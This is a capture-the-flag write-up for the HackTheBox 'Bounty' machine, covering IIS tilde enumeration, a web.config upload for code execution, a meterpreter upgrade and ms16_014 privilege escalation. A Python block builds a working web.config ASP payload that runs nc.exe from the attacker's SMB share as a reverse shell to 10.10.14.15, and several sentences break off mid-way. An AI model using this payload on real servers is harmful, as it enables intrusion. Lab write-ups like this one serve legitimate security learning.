HackTheBox - Bounty - 10.10.10.93
Bounty is an easy rated Windows Server 2008 R2 machine on hackthebox.eu.
Bounty is an easy to medium difficulty machine, which features an interesting technique to bypass file uploader protections and achieve code execution. This machine also highlights the importance of keeping systems updated with the latest security patches.
Recon and Scanning
From the ports shown here I can see that this is a Windows box running IIS 7.5; IIS 7.5 ships with Windows Server 2008 R2, so that is almost certainly the OS we are dealing with.
As HTTP (IIS) is the only open port, we should start there. This is a very outdated version of IIS, so we can check whether it is vulnerable to short-name (tilde) enumeration, a flaw that can lead to unauthorised information disclosure. The issue is triggered while IIS parses a request that contains a tilde character (~), and it may allow a remote attacker to learn the 8.3 short names of files and folders under the web root. We can use this script both to check whether the server is vulnerable and to enumerate any hidden files or directories.
The command to check whether this IIS version is vulnerable is:
Now that we know the IIS server is vulnerable, we can run the following command to enumerate hidden files and directories:
Custom Wordlist and GoBuster
Bingo! We have identified two files or directories whose short names start with upload, so we can grep a directory wordlist for that prefix and build a custom wordlist to use with gobuster.
Now that we have a custom wordlist called words we can run gobuster. As this is an IIS server, we should also fuzz for files with a
Nice, we have identified an uploadedfiles directory and the
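The short-name check and enumeration described above, together with the grep step that turns discovered prefixes into a gobuster wordlist, as an added example; it is not the scanner script or the commands from the original writeup. It runs offline: make_server is a constructed stand-in for IIS that answers probes the way a vulnerable (or a patched) server does, and the file list and dictionary are made up here.

```python
"""IIS short-name (tilde) enumeration, worked offline against a simulated server."""
from fnmatch import fnmatchcase

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_-"
MAX_TILDE = 4  # real scanners usually try ~1 .. ~4 for each stem

# Constructed sample directory listing (not taken from the box).
SAMPLE_FILES = ["uploadedfiles", "uploadtest.txt", "transfer.aspx", "index.html", "web.config"]


def alias_table(names):
    """Map each 8.3 alias Windows would generate to its long name.

    Simplified model: stem = first 6 alphanumeric chars upper-cased, ~N for
    collisions, then the first 3 chars of the extension. Hash-based aliases
    (used after 4 collisions) are not modelled. Names that already fit 8.3
    get no alias, which is why a real scanner never reports e.g. INDEX.HTM.
    """
    table, counters = {}, {}
    for name in names:
        base, dot, ext = name.rpartition(".")
        if not dot:
            base, ext = name, ""
        if len(base) <= 8 and len(ext) <= 3 and " " not in name:
            continue
        stem = "".join(c for c in base.upper() if c.isalnum() or c in "_-")[:6]
        n = counters[stem] = counters.get(stem, 0) + 1
        table[f"{stem}~{n}" + (f".{ext.upper()[:3]}" if ext else "")] = name
    return table


def make_server(names, vulnerable=True):
    """Return request(path) -> HTTP status for a fake IIS front end.

    A vulnerable IIS answers a wildcard probe such as /UPLOAD*~1*/.aspx with
    404 when some 8.3 name matches and 400 when none does; a patched server
    answers 404 either way, so the two cases are indistinguishable.
    """
    aliases = alias_table(names)

    def request(path):
        if not vulnerable:
            return 404
        pattern = path.strip("/").upper()
        if pattern.endswith("/.ASPX"):
            pattern = pattern[:-6]
        return 404 if any(fnmatchcase(a, pattern) for a in aliases) else 400

    return request


def is_vulnerable(request):
    """Simplified check: a probe that should match something vs one that cannot."""
    return request("/*~1*/.aspx") != request("/zz9zz9zz*~1*/.aspx")


def enumerate_short_names(request, prefix="", alphabet=ALPHABET, max_stem=6):
    """Depth-first search over the short-name stem, one character at a time.

    Extensions are not enumerated here; a full scanner walks them the same way
    after the ~N part.
    """
    found = []
    for n in range(1, MAX_TILDE + 1):
        # /PREFIX~N*/ matches only when the stem is exactly PREFIX.
        if prefix and request(f"/{prefix}~{n}*/.aspx") == 404:
            found.append(f"{prefix.upper()}~{n}")
    if len(prefix) == max_stem:
        return found
    for c in alphabet:
        cand = prefix + c
        if any(request(f"/{cand}*~{n}*/.aspx") == 404 for n in range(1, MAX_TILDE + 1)):
            found.extend(enumerate_short_names(request, cand, alphabet, max_stem))
    return found


def build_wordlist(short_names, dictionary):
    """Keep dictionary entries that begin with a discovered stem (the writeup's grep step)."""
    stems = {s.split("~")[0].lower() for s in short_names}
    return sorted({w for w in dictionary if any(w.lower().startswith(s) for s in stems)})


def run_demo(names=SAMPLE_FILES,
             dictionary=("admin", "images", "transfer", "upload", "uploadedfiles", "uploads")):
    """Check, enumerate, then build the gobuster wordlist; empty list if not vulnerable."""
    request = make_server(names)
    if not is_vulnerable(request):
        return []
    return build_wordlist(enumerate_short_names(request), dictionary)


if __name__ == "__main__":
    print(run_demo())
```

The important caveat is in is_vulnerable: the check only works when at least one long-named file exists under the web root, because an empty directory gives the same answer on vulnerable and patched servers.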
Getting a Shell with a web.config file
Now that we know there is a page where we can upload files, we can attempt to get a shell by uploading an IIS webshell.
Given how outdated this IIS server is, we can probably use a web.config payload to get a shell. Because web.config is an XML configuration file rather than an .aspx page, extension-based upload filters and AV signatures are far less likely to block it. The web.config file plays a role similar to Apache's .htaccess: it stores important per-directory settings, which means we can inject code into it and, once the file tells IIS to serve .config files through the ASP handler, get that code executed. This article explains the technique very well.
Creating a Malicious File
First we need to copy a malicious web.config file from here and insert code that runs an nc reverse shell.
We will also need to start an SMB server so that the target can execute nc.exe directly from our share. This can be done using the Impacket
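The shape of the web.config payload and a pre-upload sanity check, as an added example rather than the file the writeup links to. The handler mapping and the request-filtering overrides are the standard technique from the linked article; the share name, listener port and the assumption that nc.exe sits on the SMB share are mine, not the writeup's.

```python
"""Build and sanity-check a web.config that runs a command through classic ASP."""
import xml.etree.ElementTree as ET

# The writeup's attacker IP is 10.10.14.15; the share name and port are assumed here.
ATTACKER = "10.10.14.15"
DEFAULT_CMD = rf"\\{ATTACKER}\share\nc.exe -e cmd.exe {ATTACKER} 443"

TEMPLATE = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <!-- Route *.config through the classic ASP ISAPI handler (bitness64 assumes x64 IIS). -->
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- By default IIS refuses to serve .config files and the web.config segment. -->
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Response.write("-"&"->")
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c {command}")
Response.write(cmd.StdOut.Readall())
Response.write("<!-"&"-")
%>
-->
"""


def build_web_config(command=DEFAULT_CMD):
    """Embed COMMAND in the ASP block; VBScript doubles quotes inside string literals."""
    return TEMPLATE.replace("{command}", command.replace('"', '""'))


def check_web_config(cfg):
    """Checks worth running before uploading.

    IIS reads the file as configuration first, so it must still parse as XML;
    a malformed web.config yields a 500 for the directory, not code execution.
    That is why the ASP lives inside an XML comment and why the ASP block must
    never contain '--' (hence the "-"&"->" trick when writing the closing tag).
    """
    start, end = cfg.rfind("<!--"), cfg.rfind("-->")
    body = cfg[start + 4:end]
    asp_ok = "<%" in body and "%>" in body and "--" not in body
    try:
        root = ET.fromstring(cfg.encode("utf-8"))
    except ET.ParseError:
        return {"xml_ok": False, "handler_path": None, "asp_ok": asp_ok}
    handler = root.find("./system.webServer/handlers/add")
    return {
        "xml_ok": True,
        "handler_path": handler.get("path") if handler is not None else None,
        "asp_ok": asp_ok,
    }


if __name__ == "__main__":
    cfg = build_web_config()
    print(check_web_config(cfg))
    print(cfg)
```

Once uploaded, requesting the file itself (web.config in the upload directory) is what triggers the ASP handler; the nc listener on the assumed port must already be running at that point.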
Popping a Shell
Now we can head over to the transfer.aspx page and upload our malicious web.config file, with an nc listener already running. Then we can go to
Bingo! We got a shell!
Upgrading to a Meterpreter Session
Now that we have a shell, we can generate a meterpreter payload and upgrade to a meterpreter session. First we need to generate the payload and host it on our SMB server.
Generating a Meterpreter EXE Payload
Now that we have a payload, let’s setup a listener in Metasploit.
Getting a Meterpreter Session
Now that the listener and payload are ready, we can run the payload from our SMB share.
Bingo! Now that we have a meterpreter session we can attempt to privesc.
Privilege Escalation to SYSTEM
As this is a stock Windows Server 2008 R2 machine, we should run the local exploit suggester module within Metasploit.
Post Local Exploit Suggester
exploit/windows/local/ms16_014_wmi_recv_notif looks promising, so let's try it.
Let's load up this module and set the following options:
- LHOST - 10.10.14.15
- LPORT - 4444
- SESSION - 1
Bingo, we got a shell as SYSTEM!
User and Root Flags
Now that we have a shell as SYSTEM, we can grab both the user and root flags.
Now that we have rooted the machine, we can load mimikatz and dump the SAM hashes.
If you enjoyed the write up or found it useful consider + repping my htb profile linked below: